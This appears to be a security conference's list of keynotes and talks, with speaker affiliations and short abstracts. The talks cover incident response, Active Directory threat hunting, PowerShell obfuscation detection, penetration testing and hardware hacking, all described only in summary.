Omar Santos, Cisco

Keynote: IR Lessons Learned 53 68 61 64 6f 77 20 42 72 6f 6b 65 72 73 2c 20 56 61 75 6c 74 20 37 2c 20 61 6e 64 20 53 79 6e 66 75 6c 20 4b 6e 6f 63 6b

In this presentation we will cover several cases studies explaining the threat exploitation based on target industry-­types. We will cover several lessons learned while performing forensics of compromised embedded devices and infrastructure platforms. We will examine the details of custom sophisticated malware including SynFul Knock, exploits revealed by Shadow Brokers, and other examples. We will also discuss lessons learned in incident response and forensics when responding to these type of threats and incidents.

Jared Haight, Microsoft

Keynote: Giving back to infosec: A beginners guide to being helpful

“The infosec community is driven by passionate people who give back through software, talks, teaching, etc. Its one of the things that makes our community a “”community””, but a lot of people don’t feel like they have anything to offer. Those that are new to the industry don’t feel like they know enough and veterans don’t think they have anything original to contribute.
In this feel good talk of the year, we’ll cover how everyone is an awesome and valuable human being who can help make our industry even better. We’ll go over how to contribute to Open Source Projects, how to submit to CFPs, how to help with cons, as well as other ways to help. We’ll also talk about the benefits of not being a sponge and how giving back can advance your career, help you make friends, make you more attractive, increase your APMs, and lead you true happiness.”

Jose Fernandez, CompSec Direct

Talk: Frony Fronius – Exploring Zigbee signals from Solar City

Solar equipment is becoming more readily used in homes and businesses due to cost savings, eco-friendly conservationism and current tax incentives. Companies like SolarCity use Power Inverters/Meters from 3rd parties in order to provide it’s services while making the solution affordable for customers. This research will focus on understanding the communication between the Inverter, Internet Gateway and web portal used to view electrical consumption of subscriber.


Paul Calatayud

Talk: Cyber Defense Automation: A practical guide to maximizing your limited defender resources.

Many security programs have a very complex set of security investments that have created and generate a lot of information putting burdens on cyber defense teams. Coupled with lack of talent in the industry, new approaches are necessary to dig out of the current data holes we have created. This talk will explore practical ways for implementing automation within your cyber defense program.


Paul Coggin

Talk: Hallowed Be Thy Packets

Blue and Red teams are missing the low hanging vulnerabilities that exist in many enterprise networks today. This session will show in detail how the red team can quickly identify and exploit numerous network protocol vulnerabilities that the previous security test team probably missed. Methods for securing routing and switching protocols will be covered. Detailed PCAP examples will be covered. Recommendations for adding visualization and instrumentation to the network to detect network exploits will be covered.

Sean Metcalf, Trimarc Security, LLC

Talk: Detecting the Elusive: Active Directory Threat Hunting

“Attacks are rarely detected even after months of activity. What are defenders missing and how could an attack by detected?
This talk covers effective methods to detect attacker activity using the features built into Windows and how to optimize a detection strategy. The primary focus is on what knobs can be turned and what buttons can be pushed to better detect attacks.
One of the latest tools in the offensive toolkit is “”Kerberoast”” which involves cracking service account passwords offline without admin rights. This attack technique is covered at length including the latest methods to extract and crack the passwords. Furthermore, this talk describes a new detection method the presenter developed.
The attacker’s playbook evolves quickly, defenders need to stay up to speed on the latest attack methods and ways to detect them. This presentation will help you better understand what events really matter and how to better leverage Windows features to track, limit, and detect attacks.”

Lee Holmes, Microsoft


“Attackers, administrators and many legitimate products rely on PowerShell for their core functionality. However, its power has made it increasingly attractive for attackers and commodity malware authors alike. How do you separate the good from the bad?
A/V signatures applied to command line arguments work sometimes. AMSI-based (Anti-malware Scan Interface) detection performs significantly better. But obfuscation and evasion techniques like Invoke-Obfuscation can and do bypass both approaches.
Revoke-Obfuscation is a framework that transforms evasion into a treacherous deceit. By applying a suite of unique statistical analysis techniques against PowerShell scripts and their structures, what was once a cloak of invisibility is now a spotlight. It works with .evtx files, command lines, scripts, ScriptBlock logs, Module logs, and is easy to extend.
Revoke-Obfuscation has been used in numerous Mandiant investigations to successfully identify obfuscated and non-obfuscated malicious PowerShell scripts and commands.”

Stefan Edwards, Nvisium

Talk: A penetration testing anabasis

This talk is a short anabasis of someone who uses functional programming to break, rather than build, software. This talk will cover how a college dropout uses languages such as OCaml, Scala, and F# to do digital forensics, reverse engineer IoT firmware, and perform penetration tests on networks and websites alike. Additionally, we will close on ideas on how to use functional programming in modeling architecture, to allow for a more programmatic and logical approach to assessing risk for businesses and systems alike. No specific programming language is assumed, as this talk will wander, Greek-like, across the landscape of breaking and building. The purpose is to explore where functional programming can take an industry not used to formal analysis, and more likely to adopt anarchistic “hacks.”

Killan Ditch, Coalfire

Talk: Desist with Demanding Domain (aka, Stop Skipping the Strays)

Many penetration testers will hop into a network and single-mindedly chase Domain Administrator (DA) privileges. Having achieved that singular goal, some even call it quits and chalk up the test as a win. Various tools and strategies leveraging Active Directory, such as PowerShell Empire, BloodHound, and CrackMapExec, have emerged to assist and even automate the process of initial compromise through pivoting and privilege escalation. However, such tunnel vision on exploiting Windows Active Directory frequently leads to outright dismissal of the impact that the compromise of machines or accounts outside of a domain can have. This talk will explore assorted reasons why testers should consider stray non-member machines worth attacking and stop skipping them in the headlong pursuit of DA. Such consideration will include infrastructure hosts, rogue machines, and forgotten servers.

Esteban Rodriguez, Coalfire

Talk: Do more with less: Combining small findings to make a big impact

In this talk I will go through the process of evaluating an informational finding to find an additional attack surface via a discovered web app. By enumerating virtual hosts on a web server, an attacker can reach applications that were previously undiscovered by a network scan. By exploiting a persistent XSS flaw, I will show how you can gain full control of the application. After gaining control of the application, I will show how to perform post exploitation actions within the application to penetrate further into the target environment.  The focus of the talk will be on the WordPress Content Management System. I will explain how to turn any XSS flaw in any plugin into RCE on the WordPress server. I will introduce my toolset, WPForce, which can be used to backdoor core WordPress functionality to log plaintext passwords, dump hashes, inject malicious JavaScript, and pivot to other exploitation frameworks.

Jared Bare, Carfax

Talk: From Port Scanning to Password Cracking: If You’re Not Using These Open Source Tools, You’re Doing It Wrong

This talk/demo will go over the swiss army knife of open source tools any where from port scanning to password cracking. The major focus of this talk will be on NMAP and utilizing the NSE scripting engine to audit and discover devices within your own network. We will also look at other free tools such as MassScan, CensysIO and Shodan. At the end of this demo the participant should have a better understanding of the tools presented and how to utilize them within their own network. –For the reviewer of this CFP. This talk is better as a workshop, but I can condense it into a talk/demo if needed.

Arun Warikoo,  Express Scripts

Talk: How to build an Enterprise Grade Security Monitoring & Analytics Platform with Open Source

The talk will be on “How to build an Enterprise Grade Security Monitoring & Analytics Platform with Open Source”. The presentation will cover how a high level architecture of a Security Monitoring & Analytics Platform looks like, the vendors in this space, a high level design of the platform using open source that incorporates Monitoring, Analytics and Reporting.

Jaime Andres Restrepo, DragonJAR

Talk: Aventuras y Desventuras de un Pentester

Una charla que te cuenta las realidades de un pentester, lo que nadie te dice cuando decides dedicarte profesionalmente a la seguridad informatica y algunas recomendaciones para que tu vida profesional en este campo sea mas llevadera.

Price McDonald

Talk: Insecure Obsolte and Trivial: The Real IOT

Over the last few years Hardware Hacking has become a much more prevalent testing and attack avenue, however it is often misunderstood. This talk is meant to give a basic understanding of Hardware Hacking techniques, tips and tricks. In addition to real world examples and demos using budget oriented software and hardware.